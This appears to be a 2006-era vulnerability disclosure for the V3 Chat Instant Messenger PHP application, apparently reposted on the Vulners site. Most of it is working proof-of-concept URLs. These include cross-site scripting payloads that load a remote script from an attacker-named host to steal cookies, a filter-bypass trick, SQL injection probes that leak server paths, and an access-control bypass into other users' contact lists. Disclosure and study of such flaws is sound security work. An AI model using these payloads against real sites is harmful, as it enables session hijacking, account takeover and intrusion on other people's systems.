`V3 Chat Instant Messenger
http://www.v3chat.com/
Affected files:
/mail/index.php
/mail/reply.php
is_online.php
online.php
profile.php
profileview.php
search.php
mycontacts.php
expire.php
* Editing your profile:
- input boxes
------------------------------------------
Mail Vulnerabilities:
Full path disclosure via SQL injection on id when reading mail:
http://www.example.com/v3chat/mail/index.php?action=read&mid=62&id=1'
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /content/username/v/#/domain/web/v3chat/mail/index.php on line 17
XSS vuln with cookie disclosure:
We can bypass V3chats filters by using malformed img tags around out script tags. PoC:
http://www.example.com/v3chat/mail/index.php?action=read&mid=62&id=1<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>">
Replying to mail XSS vulns:
http://www.example.com/v3chat/mail/reply.php?&recipientname=Scorpio&mid=62&id=1<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>">
---------------------------------------
Members online XSS vulns with cookie disclosure:
http://www.example.com/v3chat/members/is_online.php?membername=demo&action=update&login_id=<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>">
Same as above, on online.php:
http://www.example.com/messenger/online.php?action=update&membername=luny666&site_id=<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></
SCRIPT>">
Adding members via Online.php Mysql error & full path disclosure:
http://www.example.com/messenger/online.php?action=update&membername='
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /content/username/v/#/domain/web/messenger/online.php on line 5
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Online', 'Jun 17, 2006 - 9:55 pm', '1150577732', '')' at line 1
-------------------------------------
Search.php XSS vuln:
http://www.example.com/messenger/search.php?action=update&membername=&action=search&site_id=<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>">
Adding a member from search.php XSS vuln:
http://www.example.com/messenger/search.php?membername=luny666&memberid=287&contact_id=1&contact_name=<IMG%20SRC=javascript:alert(document.cookie)>&site_id=&add=1&s=1&r=0&min_age=16&max_age=100&location=&gender1=&gender2=
--------------------------------------
Same as above, this time on profile.php:
http://www.example.com/messenger/profile.php?new_reg=1&site_id=<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>">
-----------------------------------
Same as above, on Profileview.php now:
http://www.example.com/messenger/profileview.php?membername=demo<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>">
----------------------------------
XSS vuln with cookie disclosure when editing profile:
To bypass V3 chats filters we can use this XSS example. Credits to RSnake.Script tags wrapped around a document.write function that writes part of our second
script tag.
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://youfucktard.com/xss.js"></SCRIPT>
-------------------------------
Mycontacts.php XSS vulns with user bypass.
It seems after you log in as a user youre able to put in any username in membername= and it will navigate you to their buddylist. From there you can add,
remove, chat with, etc people on their buddylist. etc.
PoC:
http://example.com/messenger/mycontacts.php?membername=putausername
-------------------------------
Expire.php XSS vuln:
http://example.com/messenger/expire.php?cust_name=<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>">
-----------------------------
Screenshots:
http://www.youfucktard.com/xsp/v3chat1.jpg
http://www.youfucktard.com/xsp/v3chat2.jpg
http://www.youfucktard.com/xsp/v3chat3.jpg
http://www.youfucktard.com/xsp/v3chat4.jpg
http://www.youfucktard.com/xsp/v3chat5.jpg
http://www.youfucktard.com/xsp/v3chat6.jpg
http://www.youfucktard.com/xsp/v3chat7.jpg
http://www.youfucktard.com/xsp/v3chat8.jpg
http://www.youfucktard.com/xsp/v3chat9.jpg
http://www.youfucktard.com/xsp/v3chat10.jpg
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation